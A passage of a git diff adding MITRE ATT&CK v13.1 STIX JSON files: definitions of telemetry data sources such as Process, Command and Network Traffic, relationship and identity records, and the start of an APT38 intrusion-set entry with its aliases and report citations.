"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:26.515Z", + "name": "Process", + "description": "Instances of computer programs that are being executed by at least one thread. 
Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0009", + "external_id": "DS0009" + }, + { + "source_name": "Microsoft Processes and Threads", + "description": "Microsoft. (2018, May 31). Processes and Threads. 
Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-12-07T19:45:09.019Z", + "name": "Logon Session", + "description": "Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)", + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0028", + "external_id": "DS0028" + }, + { + "source_name": "Microsoft Audit Logon Events", + "description": "Microsoft. (2021, September 6). Audit logon events. 
Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0015", + "external_id": "DS0015" + }, + { + "source_name": "Confluence Logs", + "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. 
Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + } + ], + "modified": "2022-05-11T14:00:00.188Z", + "name": "Application Log", + "description": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:00.625Z", + "name": "Command", + "description": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Network", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Austin Clark, @c2defense" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0017", + "external_id": "DS0017" + }, + { + "source_name": "Confluence Linux Command Line", + "description": "Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" + }, + { + "source_name": "Audit OSX", + "description": "Gagliardi, R. (n.d.). 
Audit in a OS X System. Retrieved September 23, 2021.", + "url": "https://www.scip.ch/en/?labs.20150108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-12-07T19:50:56.964Z", + "name": "Script", + "description": "A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0012", + "external_id": "DS0012" + }, + { + "source_name": "FireEye PowerShell Logging", + "description": "Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" + }, + { + "source_name": "Microsoft AMSI", + "description": "Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + }, + { + "source_name": "Microsoft PowerShell Logging", + "description": "Microsoft. (2020, March 30). about_Logging_Windows. 
Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:13.356Z", + "name": "Network Traffic", + "description": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "ExtraHop" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0029", + "external_id": "DS0029" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" 
+ ], + "id": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0011", + "external_id": "DS0011" + }, + { + "source_name": "Microsoft LoadLibrary", + "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" + }, + { + "source_name": "Microsoft Module Class", + "description": "Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Module", + "description": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/datasources/DS0024", + "external_id": "DS0024" + }, + { + "source_name": "Microsoft Registry", + "description": "Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + } + ], + "modified": "2022-05-11T14:00:00.188Z", + "name": "Windows Registry", + "description": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-24T19:14:15.637Z", + "name": "Asset", + "description": "Data sources with information about the set of devices found within the network, along with their current software and configurations", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0039", + "external_id": "DS0039" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-12-07T19:35:34.863Z", + "name": "File", + "description": "A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)", + 
"x_mitre_platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0022", + "external_id": "DS0022" + }, + { + "source_name": "Microsoft File Mgmt", + "description": "Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0016", + "external_id": "DS0016" + }, + { + "source_name": "Sysmon EID 9", + "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. 
Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread" + } + ], + "modified": "2022-03-30T14:26:51.804Z", + "name": "Drive", + "description": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0001", + "external_id": "DS0001" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Firmware", + "description": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Containers", + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" 
+ ], + "id": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0003", + "external_id": "DS0003" + }, + { + "source_name": "Microsoft Tasks", + "description": "Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Scheduled Job", + "description": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0033", + "external_id": "DS0033" + }, + { + "source_name": "Microsoft NFS Overview", + "description": "Microsoft. (2018, July 9). Network File System overview. 
Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Network Share", + "description": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0019", + "external_id": "DS0019" + }, + { + "source_name": "Microsoft Services", + "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" + }, + { + "source_name": "Linux Services Run Levels", + "description": "The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. 
Retrieved September 28, 2021.", + "url": "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + } + ], + "modified": "2022-03-30T14:26:51.807Z", + "name": "Service", + "description": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-12-07T19:50:43.993Z", + "name": "User Account", + "description": "A profile representing a user, device, service, or application used to authenticate and access resources", + "x_mitre_platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0002", + "external_id": "DS0002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "ics-attack" + ], + "id": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + 
"revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0057", + "external_id": "G0057" + } + ], + "modified": "2018-10-17T00:17:13.469Z", + "name": "APT34", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--dfd0dc6c-33ad-44a4-9def-1d8e23e278fb", + "created": "2022-04-15T22:05:32.209Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-15T22:05:32.209Z", + "relationship_type": "revoked-by", + "source_ref": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", + "target_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--632ca9a0-a9f3-4b27-96e1-9fcb8bab11cb", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6", + "target_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--90647f03-38a4-4364-a3af-53640a81360e", + "created": "2023-03-31T18:11:19.943Z", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik August 2019", + "description": "Joe Slowik 2019, August 15 CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack 
Retrieved. 2019/10/22 ", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T18:11:19.943Z", + "description": "(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Joe Slowik August 2019)", + "relationship_type": "attributed-to", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "type": "identity", + "identity_class": "organization", + "created": "2017-06-01T00:00:00.000Z", + "modified": "2017-06-01T00:00:00.000Z", + "name": "The MITRE Corporation" + }, + { + "definition": { + "statement": "Copyright 2015-2023, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "type": "marking-definition", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0" + } + ], + "spec_version": "2.0" +} 
diff --git a/cti-ATT-CK-v13.1/ics-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json b/cti-ATT-CK-v13.1/ics-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json new file mode 100644 index 0000000000000000000000000000000000000000..49a8aa5c2bd70fe0380bb5ab1e5a19227efddb99 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--980aaf59-907a-45de-a2cb-591831336d1b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "type": "identity", + "identity_class": "organization", + "created": "2017-06-01T00:00:00.000Z", + "modified": "2017-06-01T00:00:00.000Z", + "name": "The MITRE Corporation" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json new file mode 100644 index 0000000000000000000000000000000000000000..5848772a4deb70ee859d24450acea41540096808 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json 
@@ -0,0 +1,94 @@ +{ + "type": "bundle", + "id": "bundle--8eb81101-b697-4838-95ed-743d52c74fbe", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT38", + "NICKEL GLADSTONE", + "BeagleBoyz", + "Bluenoroff", + "Stardust Chollima" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340", + "type": "intrusion-set", + "created": "2019-01-29T21:27:24.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0082", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0082" + }, + { + "source_name": "APT38", + "description": "(Citation: FireEye APT38 Oct 2018)" + }, + { + "source_name": "NICKEL GLADSTONE", + "description": "(Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)" + }, + { + "source_name": "BeagleBoyz", + "description": "(Citation: CISA AA20-239A BeagleBoyz August 2020)" + }, + { + "source_name": "Bluenoroff", + "description": "(Citation: Kaspersky Lazarus Under The Hood Blog 2017)" + }, + { + "source_name": "Stardust Chollima", + "description": "(Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)" + }, + { + "source_name": "CISA AA20-239A BeagleBoyz August 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-239a", + "description": "DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021." + }, + { + "source_name": "FireEye APT38 Oct 2018", + "url": "https://content.fireeye.com/apt/rpt-apt38", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018." 
